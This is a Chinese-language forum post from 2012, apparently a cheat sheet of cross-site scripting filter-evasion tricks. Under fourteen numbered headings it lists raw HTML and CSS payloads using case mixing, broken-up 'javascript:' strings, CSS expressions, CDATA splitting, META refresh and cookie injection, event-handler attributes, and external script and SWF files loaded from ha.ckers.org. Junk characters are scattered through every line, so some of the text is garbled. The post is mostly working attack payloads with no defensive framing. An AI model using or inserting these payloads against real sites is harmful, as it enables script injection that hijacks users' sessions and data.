1. 改变字符大小写' \' y3 Z3 F4 f; E$ D
7 e' ?# A( N, [+ E0 b G ( X- W8 T3 d% F8 d
8 x. o- ^& | p6 ?9 X7 T <sCript>alert(‘d’)</scRipT>. n# W# t, q7 W4 q. y
; T5 C. r2 W5 G" O* [) `2. 利用多加一些其它字符来规避Regular Expression的检查
- H0 \( \; V5 J- h, q+ V, ~
! m2 Q8 t* r W8 k* j6 G; ?6 V <<script>alert(‘c’)//<</script>" b" Z4 i. W9 S) `+ k
9 n8 b! | Q4 D <SCRIPT a=">" SRC="t.js"></SCRIPT>! n: f$ x& x. e4 s: u$ l% N
6 D8 l8 ?1 l+ p& Q3 I <SCRIPT =">" SRC="t.js"></SCRIPT>" q5 b5 _( s* K5 Y: k- M3 T
: R0 C6 [# A5 J+ ~, w3 e
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>
. H- p: Q t7 B- s& p% V# j( i5 |+ U G, Z) H7 n3 @1 ?/ _' X6 K
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>) B) x! Q$ [$ I: N; D
. f# |, [: b6 B" d% B' ]2 p2 y' j
<SCRIPT a=`>` SRC="t.js"></SCRIPT>' m! Y- w9 L) W S) c$ h
% J+ V! z6 Q9 A9 R# h/ ~
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>
/ V K) e* K% Q! B+ G" P
, a, D4 Q6 B. |$ Y# I, t3. 以其它扩展名取代.js8 B4 ?5 H: A) _/ B3 |# [- d
9 ]( x) G7 k3 c4 l/ R8 ~. v <script src="bad.jpg"></script>+ o' d2 {3 y$ H3 l6 x' v! L
) l+ d% j" e: r) }) M2 w W4 p
4. 将Javascript写在CSS档里
* j/ x- S1 M- H* A
* a% |. f" d' \( w; h4 e <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
! o0 J$ A/ ]; u1 `2 T; z, i' Z( U9 V
example:
L" V6 R' }- W8 u" h! F6 `& i' X/ X s; a1 A" H
body {
* K" f# c5 v8 k; m
& t1 L8 X# ]: \3 c- \ background-image: url(‘javascript:alert("XSS");’)
& J5 n- L+ D! d* Y" p
& }$ a9 G# g: x7 X" Q# K* P }
: b% w9 h; y, _+ c8 ?
6 S( j6 b+ I' b0 ?& L, D; x, e5. 在script的tag里加入一些其它字符 L- K& S& T* G% ?' d
/ b( ]' q- _* c9 v* b
<SCRIPT/SRC="t.js"></SCRIPT>& l; J+ ?/ k5 J4 Q
( s! }7 x' h+ l7 _1 s p! n+ Y <SCRIPT/anyword SRC="t.js"></SCRIPT>2 a) U; D, I# x% t
% X$ S# w; P, r4 H+ n) q* K. o0 l6. 使用tab或是new line来规避& @5 ?; e/ d5 S; O+ z- p) [
0 p1 ]) [7 H- ^, ~6 S) ?- ?( m& q
<img src="jav ascr ipt:alert(‘XSS3′)">
. O& ^' W2 h) J7 f9 m. _
: `6 K. K) Z# B: P <img src="jav ascr ipt:alert(‘XSS3′)">2 Z# y& O( Z% l) V3 ?% j/ A8 {
- B$ f" c8 |8 z" ~! b
<IMG SRC="jav ascript:alert(‘XSS’);">
/ m9 J* Y0 Q. A) f
! c8 j2 [3 d Z2 B }, ^0 | -> tag6 G. W' f+ m5 Z3 _) {4 b! n3 _) \' a/ ?
' e( V5 ^: s" d
-> new line
6 T5 K. ~. D0 |- [$ N9 E! v0 V$ \7 m" w5 [- P6 J: U# X
7. 使用"\"来规避
/ p7 `9 a9 m) f; t5 X) Y- `) o/ k1 ?1 g
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
* V8 G& Z+ \! M4 t/ h# u- |$ P3 ^, R
7 W% F- b: E; f2 j <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
0 F1 s+ t A& P, N3 L3 w }5 e7 I$ b" y& P+ m: Q4 c
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
* {: q8 R4 K8 r1 ] M3 P: {& A3 c: i i8 v! G S' O2 B7 e7 R& `
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">- H; T. U1 _1 m5 |
' f8 l6 m1 i# F. q8 I- `& p <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
; Y0 h7 _# g, F5 r& t4 Q1 I5 v4 E6 N2 K8 V9 u! u2 s% l6 D
8. 使用Hex encode来规避(也可能会把";"拿掉)4 ^5 W; P6 m! L! n! P3 K3 F4 L
E* j3 W5 l. p T <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
( ]9 P% ^ C7 B2 d$ o$ D
& z1 g" S* y+ e& t 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">: n$ L: ]" d2 ~' ?' T
4 O! i1 ^7 N" q <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">3 T$ q3 j# u' H5 i6 l
) v& A1 K, d5 s5 S* |/ C, }
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">3 f& C0 t5 [+ |5 o
; ~, u) g8 h* X: O2 L! n4 F3 T9. script in HTML tag
9 I, t3 X- c. D! _: j5 y- P' W! b8 y* W0 t5 t& y) O
<body onload=」alert(‘onload’)」>% {: E7 [$ E; o7 I: D$ c* F6 ~
$ n1 Z0 G+ H2 K% g
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
) ~0 `5 S' _1 Y1 H8 \) B% C- k$ v5 J3 |0 Q7 E
10. 在swf里含有xss的code
! g( D" A5 Q/ }# @5 @9 v5 Y0 I7 Z+ ~/ Q B
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>/ P* F) O% ~: l# u% |; ^
3 U/ E( g$ R% @$ W. b d0 J11. 利用CDATA将xss的code拆开,再组合起来。3 C! z+ X, j O. B
7 {- b) @3 G$ a" y( F% J r# H
<XML ID=I><X><C>
; }/ \$ ]( V8 l% h( ? W. i2 Q1 {2 P' j
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
$ p" \, `" E. Y2 B/ A8 m ^- S& }
5 _# s2 l5 e' E! ?9 J# D; N </C></X> ]8 { p/ P9 V. ~6 o1 R
: X) y: A+ @( G8 V4 K, e
</xml>
a. ~( o/ E" ?' e, _& g
. Y! }, l \% E, w <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
; Q+ L9 e+ B% l. T7 \2 l2 y
5 [; I% c; {5 l. {* ~ B; i7 Y% I <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
8 m. ?- N( t( h# t' P7 c" J
' L* U, B) |6 P <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
( r1 N0 N' H1 ?; {' ~) d8 y9 L/ W; D$ h
12. 利用HTML+TIME。
?) Y8 s1 h+ e' E. O4 g, t. S3 d) g" l9 `9 Z! T# z A
<HTML><BODY>8 o9 b. C; a0 k) J! f0 C
; R# [$ T1 q2 U' p <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
6 `& v# X8 s. H& p: c0 @9 E& {- F. c, i9 Z( i# E5 V9 D9 K
<?import namespace="t" implementation="#default#time2">( |1 S. R- D V: Y6 u- ^
+ b T( a3 J( R+ p5 Q& _- D
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">( T# S. \ G& D. N- {+ g
; m' t5 b( R1 T) { Y# B/ a" d, m
</BODY></HTML>" h* {4 x9 K' p
- [7 Y% L3 I( k% M
13. 透过META写入Cookie。
: I+ c& k7 u [- x" w( A3 l: b( ^: [5 I# h& Y2 U" P
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">$ M9 r* T& e8 o5 w) A _
) l3 E. V7 t9 [, r14. javascript in src , href , url, S1 Y& |* T; s2 s% \, B
; J, R. n3 N% ^. A+ ?1 n2 J! ?* t <IFRAME SRC=javascript:alert(’13′)></IFRAME>) P1 i3 T& Z8 E2 H g
' g4 g2 @, ]% [* z2 Q- h
<img src="javascript:alert(‘XSS3′)">
8 M7 k j' A; A2 Y6 O5 J. B+ w8 B4 g! u: D A
<IMG DYNSRC="javascript:alert(‘XSS20′)">" z+ R' v& @8 s# g/ D
3 l9 m v: j% z; {4 J" f( r% A <IMG LOWSRC="javascript:alert(‘XSS21′)">5 Y9 b0 T+ R* t. |% F. u j$ D
& ?! k' U4 ~9 x% c) J1 m! _ <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
$ o7 Y+ F# A, v+ j: v, O+ y+ Z6 W& Y
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>0 X% W/ i0 S1 {3 b
) k) S+ N) c5 S1 i8 l <TABLE BACKGROUND="javascript:alert(‘XSS29′)">
% m( k- `: F* J* q
- X t' p r$ H1 ~) n1 h <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
1 {: X! l4 p7 Z9 Z& i* F# r' O0 f+ v: r. s8 r* p% N! \. N7 S5 B
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
1 j. m; Z0 z. Q' e& [
6 r' Q, F2 c% d( t </STYLE><A CLASS=XSS></A>
! w) Y& A6 n/ `6 n7 |- i9 h! ]& v5 y; G! y' u
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
1 l- }5 i- P% R8 L X# q* ?9 r, m, L& |/ f- L. W, a
|
发表于 2012-12-31 09:59:28
收藏
支持
反对